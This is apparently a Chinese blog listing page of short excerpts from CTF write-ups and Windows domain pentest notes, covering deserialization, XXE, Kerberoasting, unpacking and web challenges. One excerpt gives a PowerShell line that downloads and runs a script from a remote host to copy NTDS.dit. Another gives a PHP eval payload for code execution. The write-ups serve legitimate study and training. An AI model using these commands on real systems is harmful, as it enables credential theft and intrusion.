台部落HyyMbb

參考鏈接從Balsn CTF pyshv學習python反序列化源碼以及wp：https://github.com/sasdf/ctf/tree/master/tasks/2019/BalsnCTF/misc python反序

2020-07-05 01:29:41

學校戰隊總排名五十幾，web和pwn各拿了一個一血，只能說師傅太強了，不過後來的排名有點起飛，最後半小時，直接從前十名飛出去了~~ filejava 這道題主要考察的是java的xxe漏洞，這個題目總共有兩個功能，上傳和下載功能

2020-07-05 01:29:41

基礎介紹 c：引入模塊和對象，模塊名和對象名以換行符分割。（find_class校驗就在這一步，也就是說，只要c這個OPCODE的參數沒有被find_class限制，其他地方獲取的對象就不會被沙盒影響了，這也是我爲什麼要用geta

2020-07-05 01:29:41

insanity 拖進IDA 直接F5查看見源代碼 shift+F12查看main函數的字符串得到flag python-trade 一道python逆向題我們下載附件得到pyc文件 (pyc文件就是 py程序編譯後得到的字節

2020-07-05 01:29:41

攻擊簡介過程：查詢SPN，找到有價值的SPN，需要滿足以下條件： 1、該SPN註冊在域用戶帳戶(Users)下 2、域用戶賬戶的權限很高 3、請求TGS 4、導出TGS 5、暴力破解 SETSPN setspn

2020-07-05 01:29:41

簡介就是在應用加殼的情況下，能夠精確定位字符串，並且定位關鍵函數地址實戰這兒需要我們填寫註冊碼我們隨便填寫載入Ollydbg 運行程序 CTRL+g 輸入401000，跳轉到這個地址這個時候就可以查

2020-07-05 01:29:41

獲取NTDS.dit 加載ps腳本 IEX (New-Object Net.WebClient).DownloadString("http://192.168.1.5/Invoke-NinjaCopy.ps1"); 提取本地sa

2020-07-05 01:29:41

題目介紹首先這是一個typecho的框架然後通過掃目錄得到www.zip源碼泄露，然後就是審計代碼了~~ 解題過程首先我們找到輸入點在插件中，我們發現action()的代碼這兒需要說明一下，這兒的action一般是自動

2020-07-05 01:29:41

使用ESP定律脫殼實戰查殼載入OD 首先F8 在這麼多寄存器中，只有ESP是紅色的，則可以使用ESP定律來脫殼選擇好ESP地址，然後右鍵，在數據窗口中跟隨這個時候就來到了ESP指定的地址然後選擇幾個數據（

2020-07-05 01:29:41

這次比賽，我只能說這就是RCTF？ i了i了~~ 這次有一道web題目，是關於反序列化的，這兒稍微記錄一下其中的知識點~ 題目源碼 <?php Swoole\Runtime::enableCoroutine($flags = SW

2020-07-05 01:29:41

環境域： test.com 域控：Windows server 2012R2，主機名： AD， IP： 192.168.1.7 域內主機：系統：windows 2012R2，主機名：HyyMbb，ip：192.168.1.22

2020-07-05 01:29:41

這個功能會通過LDAP查詢域內用戶設置了選項”Do not require Kerberos preauthentication”，然後發AS_REQ的包，直接生成hash或者john可破解的格式我們先設置一個用戶不需要預驗

2020-07-05 01:29:41

文件探測File Detect 這個題目主要的考點爲： php字符串格式化漏洞 SSRF CBC逃逸針對第一個考點我們只需要在前拼接的字符串中加入%s%就可以了，這樣最後面的%就會將代碼中的%d吞掉針對第二個考點沒啥

2020-07-05 01:29:41

合約地址 0x421DbB4ca0Fdb1872e5780BD95743085357CD7B8 源代碼 pragma solidity ^0.4.23; contract Trans{ string flag;

2020-07-05 01:29:41

RCE_NOPAR 無字符GETSHELL就行 payload：eval(hex2bin(session_id(session_start()))) 改PHPSSEION值爲16進制就行 SSRF 把file後面的參數兩層bas

2020-07-05 01:29:41